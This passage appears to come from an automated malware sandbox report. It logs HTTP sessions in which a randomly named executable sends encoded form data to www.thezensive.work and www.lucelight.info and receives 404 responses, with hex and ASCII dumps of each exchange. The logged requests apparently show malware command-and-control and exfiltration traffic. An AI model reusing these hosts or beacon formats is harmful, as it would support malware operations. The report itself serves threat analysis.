                                                                      Data Ascii: 8jT4kL=tVMDfxUOicSYWpuI2Q9hw2jB2aqB1EmKD9Gf5ad6rq1zoMKePfQH4aAunpBJlNTI9fXpESnPWup3aTJ37S4nwZhdjnh/9kMwLillO09LOLf5VZyDmCjFSnMGcBK8hApqS4bXXa76MhJfWdPBvi8xNgDRAKkyxVFFD/uJs3CeyZGikfsy0wLAuqCk1gkYw7JzLRIKjiTrwcXxn2mAmD/9gsw4QG0Gn4HfA+d+qjTMlXHrLlo2TcWcNQuwmYosalRdLe3XDt1LXC6oOWkUYNWKsRpLb136vo2/KXgf4GWJvE/s2zZxQazxbWv74Kkmz25UF1nVz0NDaI0vGm/zhdhTI0825JCi5w/vZwb0ItqzH/u87Ea/VF6Z4zup0QaxcbW3LvC3A0camsvUWZzmBWmg9Z+1crDnbQOluWWsOsuI9mvb77uInIaBvJBWDnmYdelgvqlqXRdRdsUfiWOMx0DCYh714H9OUWf7k1YH9y9lIsHPbNgSC/MlRWbBe5YElCSivkh2DJ2Q3gKCVGSGz/hrN4UqYnsxk74YLCchscn7BvzsIWmercMK4F4JGJcJc3GcVzHEEmuStaeSrxqdipW79dfh2+balq/JqBCgoBvMZxkZbu18CUSxHC/BE/T6DdntSko00UJuAL747d2icZ4QIITc1XkkgQ9rWgy1jhhnrMnP6uxt44plQpZJZFV5KBpruQY4vO1VRmG5Ro7/meqwJsfH8povTzc9MDMj0jFB31XkuZtAtHvSNAKtAEIHdhD+9rL+kGKYc4/UOej/XmCT3BCcBSvixhIWgTMi48UhT/+VYMXtLQYs7op2MJsWKmL106arqxOKYBHV+j4LmEwt8/iHMpR++iN3inBYvC9CsdaxMW38AmHQ1jjILDt8IGm9ecovfiptf/eBobaVDYbCOvDMFjFUOcQqfRf+aUrpkUMd412dMOkk/k0ZHB1qTGVYHiFv0FKa7WoNCTuwOThNVD/TufOQpjrsBXbYobkxYUCgF [TRUNCATED]
                                                                      Nov 28, 2024 10:07:54.136221886 CET1236INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:53 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DRECV0QCFB3VMWN6DWR9
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:54.136240959 CET1236INData Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:54.136253119 CET512INData Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DRECV0QCFB3VMWN


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.6497413.75.10.80806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:07:55.409780025 CET517OUTGET /lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.thezensive.work
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:07:56.785020113 CET1236INHTTP/1.1 404 Not Found
                                                                      Content-Type: text/html
                                                                      Date: Thu, 28 Nov 2024 09:07:56 GMT
                                                                      Server: Netlify
                                                                      X-Nf-Request-Id: 01JDS0DTXNT6WHCKFYNRXSQH0S
                                                                      Connection: close
                                                                      Transfer-Encoding: chunked
                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:56.785041094 CET1236INData Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:56.785056114 CET512INData Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DTXNT6WHCKFYNRX


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.649742103.168.172.37806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:08:03.013453960 CET773OUTPOST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 54 56 53 47 4a 74 65 78 30 6f 30 7a 72 51 38 74 32 71 58 7a 47 66 44 6a 36 70 6d 31 7a 4d 7a 64 37 5a 45 41 72 77 46 53 72 4e 71 65 35 2f 5a 73 49 33 45 50 50 66 70 36 6f 54 41 45 4f 78 44 48 43 62 67 79 79 53 4a 4f 33 4b 52 36 36 30 67 4d 79 52 33 6d 37 47 6c 4a 61 65 77 35 35 57 66 45 74 72 5a 43 44 42 64 57 33 76 45 7a 67 66 67 63 32 7a 55 78 41 55 6d 43 67 50 32 32 34 79 55 69 51 63 73 2b 71 59 75 37 67 77 6b 61 4d 50 4f 77 61 6f 48 4e 69 6b 35 79 36 72 32 67 78 5a 42 58 78 42 6f 6e 74 69 7a 39 4b 63 79 7a 6d 44 34 79 46 33 37 46 56 30 65 54 50 2f 54 4c 2b 2b 6e 66
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJTVSGJtex0o0zrQ8t2qXzGfDj6pm1zMzd7ZEArwFSrNqe5/ZsI3EPPfp6oTAEOxDHCbgyySJO3KR660gMyR3m7GlJaew55WfEtrZCDBdW3vEzgfgc2zUxAUmCgP224yUiQcs+qYu7gwkaMPOwaoHNik5y6r2gxZBXxBontiz9KcyzmD4yF37FV0eTP/TL++nf


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.649743103.168.172.37806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:08:05.681632042 CET797OUTPOST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 52 30 43 47 46 75 6d 78 78 49 30 79 75 51 38 74 6a 36 58 76 47 66 50 6a 36 73 44 6f 7a 2f 58 64 37 34 30 41 71 78 46 53 71 4e 71 65 33 66 5a 6a 58 6e 45 45 50 66 31 59 6f 57 34 45 4f 78 48 48 43 5a 49 79 31 67 68 4e 32 61 52 34 6a 45 67 4f 32 52 33 6d 37 47 6c 4a 61 65 31 63 35 57 48 45 74 37 70 43 52 77 64 56 70 2f 45 73 6f 2f 67 63 79 7a 55 39 41 55 6d 67 67 4b 4b 63 34 32 6b 69 51 64 63 2b 71 4a 75 34 37 67 6b 41 42 76 50 41 57 61 6d 4b 37 57 30 6a 35 74 6e 44 79 4c 70 6f 39 58 31 39 78 52 7a 65 59 4d 53 78 6d 42 67 41 46 58 37 76 58 30 6d 54 64 6f 66 73 78 4b 43 38 4d 43 37 4e 4f 7a 51 30 58 77 50 30 51 76 78 31 6f 62 4d 56 73 77 3d 3d
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJR0CGFumxxI0yuQ8tj6XvGfPj6sDoz/Xd740AqxFSqNqe3fZjXnEEPf1YoW4EOxHHCZIy1ghN2aR4jEgO2R3m7GlJae1c5WHEt7pCRwdVp/Eso/gcyzU9AUmggKKc42kiQdc+qJu47gkABvPAWamK7W0j5tnDyLpo9X19xRzeYMSxmBgAFX7vX0mTdofsxKC8MC7NOzQ0XwP0Qvx1obMVsw==
                                                                      Nov 28, 2024 10:08:06.770634890 CET582INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:06 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_5b4d2af7f47172ab0c7e3938fb93bc67
                                                                      Content-Encoding: br
                                                                      Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.649744103.168.172.37806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:08:08.423368931 CET1810OUTPOST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 52 30 43 47 46 75 6d 78 78 49 30 79 75 51 38 74 6a 36 58 76 47 66 50 6a 36 73 44 6f 7a 2f 66 64 38 4b 38 41 6f 57 78 53 77 4e 71 65 2f 2f 59 45 58 6e 45 6a 50 66 74 63 6f 57 39 7a 4f 7a 50 48 42 34 6f 79 77 52 68 4e 76 71 52 34 2b 30 67 54 79 52 33 4a 37 43 42 4e 61 66 46 63 35 57 48 45 74 39 46 43 54 68 64 56 72 2f 45 7a 67 66 67 59 32 7a 55 52 41 51 44 64 67 4c 61 6d 34 46 73 69 51 39 4d 2b 35 4c 47 34 6d 77 6b 65 43 76 50 59 57 61 71 46 37 57 6f 76 35 74 36 55 79 4c 64 6f 2f 79 73 45 73 68 50 30 50 75 2b 6f 6d 6a 55 2b 4e 79 50 7a 51 33 32 2b 54 4f 61 52 34 37 37 55 4d 57 50 56 4f 7a 70 73 57 68 47 56 62 62 5a 6a 6b 62 4a 69 35 51 73 54 2b 6b 70 6e 54 33 6a 31 73 65 70 41 32 6b 34 4e 6e 54 57 4f 53 6c 34 50 42 31 4e 4f 37 49 30 70 57 30 45 6e 6b 4d 36 4f 35 49 61 51 36 73 45 46 38 71 2f 34 71 61 4b 2b 4e 79 39 77 71 4f 32 78 30 51 34 56 44 6b 70 43 76 75 4b 4b 54 6c 4b 38 74 44 69 35 57 4c 73 74 69 53 6d 34 45 70 65 72 37 56 6d 44 47 59 33 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJR0CGFumxxI0yuQ8tj6XvGfPj6sDoz/fd8K8AoWxSwNqe//YEXnEjPftcoW9zOzPHB4oywRhNvqR4+0gTyR3J7CBNafFc5WHEt9FCThdVr/EzgfgY2zURAQDdgLam4FsiQ9M+5LG4mwkeCvPYWaqF7Wov5t6UyLdo/ysEshP0Pu+omjU+NyPzQ32+TOaR477UMWPVOzpsWhGVbbZjkbJi5QsT+kpnT3j1sepA2k4NnTWOSl4PB1NO7I0pW0EnkM6O5IaQ6sEF8q/4qaK+Ny9wqO2x0Q4VDkpCvuKKTlK8tDi5WLstiSm4Eper7VmDGY3GDLxXPjx7rmWhle6EERsDcU4TZZLMPDeNL7mUBs63qp/Al1OLNUfAGgfeKSQsEoYoG2c1mgctLB5PJ+/SSCEj04RT89dNgk2hTiReL/U0IUfihdx5hnY2eR9eFBERw3GJkgV7BivhQpgj8exH2GWVZievvAAmh7RNFSFxjtdY5iHSgfo9mG1li6MC4WBZjFwYm8GMVm9qEbouszCL/ZNB30OAP1Bf3T0bGG+mWRzW0VbYdDzS9vI5jQ28csTNvwAqRZiSxpwLvbK/stn9cFR9OuSalDQdTOo7deSmFU9b71JjFBAFMuYTUS5JBXQrJO6JoW/qwWt43q5Bnzo3PtTo3C/FAvG63Hh4k9q1F5N6T4jnQN3Ks1WPlGS/JzOEg6dgM6NdWKL8D9a5dIdAcujEJUVj3+PuynIHl1b/wt87t2gEIQjEjL9alJwIcwDEEB5pddH3alCvWr0FV66pvVKw/kDXPN9yVtlZ4fSVJu5amZFITedGHDelYRtiU9a5UX8BrMliw0i+V9/+yPZQse9TGRVty2UziAWqOdrO89mAjiookUknks7UxDy0uCmvCR/h6rG2IWpb+z6VXtcsl5k3vOx8TvGtKk6ua9P1lb5y4r3OJVXs8z9JZG/2WrP1PXSkPJk3glqiSCVIEsGQAR8kMFjmNxeVTvE6N [TRUNCATED]
                                                                      Nov 28, 2024 10:08:09.552851915 CET582INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:09 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_c275695ec835c24b79fdf1b98c0f041e
                                                                      Content-Encoding: br
                                                                      Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.649745103.168.172.37806404C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 28, 2024 10:08:11.082936049 CET516OUTGET /ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:08:12.231089115 CET808INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:12 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Content-Length: 544
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_0e1ea0d4fccdbcb1b40b9e304d7b0d5e
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

